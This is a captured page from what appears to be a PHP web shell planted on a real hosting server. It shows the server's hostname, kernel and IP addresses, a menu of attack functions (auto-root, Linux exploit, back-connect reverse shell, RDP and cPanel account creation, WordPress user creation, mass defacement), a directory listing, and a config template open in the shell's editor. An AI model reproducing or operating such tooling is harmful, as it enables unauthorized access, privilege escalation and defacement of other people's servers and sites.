Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 3.15.168.130
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
phoenix /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_clone.php
3.95
KB
-rw-r--r--
_configure.php
977
B
-rw-r--r--
configure.php
649
B
-rw-r--r--
edit.php
5.38
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
788
B
-rw-r--r--
import.php
3.5
KB
-rw-r--r--
info.xml
3.22
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.64
KB
-rw-r--r--
install.xml
1.06
KB
-rw-r--r--
md5
1.63
KB
-rw-r--r--
notes.txt
478
B
-rw-r--r--
update_pass.php
4.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _configure.php
<?php error_reporting(E_ALL); const HTTP_SERVER = '[[protocol]]://[[domhost]]'; const COOKIE_OPTIONS = [ 'lifetime' => 0, 'domain' => '[[domhost]]', 'path' => '[[relativeurl]]/admin', 'samesite' => 'Lax', [[secure]] ]; const DIR_WS_ADMIN = '[[relativeurl]]/admin/'; const HTTP_CATALOG_SERVER = '[[protocol]]://[[domhost]]'; const DIR_WS_CATALOG = '[[relativeurl]]/'; date_default_timezone_set('America/New_York'); const DIR_FS_CATALOG = '[[softpath]]/'; const DIR_FS_DOCUMENT_ROOT = '[[softpath]]/'; const DIR_FS_ADMIN = '[[softpath]]/admin/'; const DIR_FS_BACKUP = DIR_FS_ADMIN . 'backups/'; // If you are asked to provide configure.php details, // before sharing, please remove the data below and // obfuscate the admin folder and home directory (DIR_FS). const DB_SERVER = '[[softdbhost]]'; const DB_SERVER_USERNAME = '[[softdbuser]]'; const DB_SERVER_PASSWORD = '[[softdbpass]]'; const DB_DATABASE = '[[softdb]]';
Close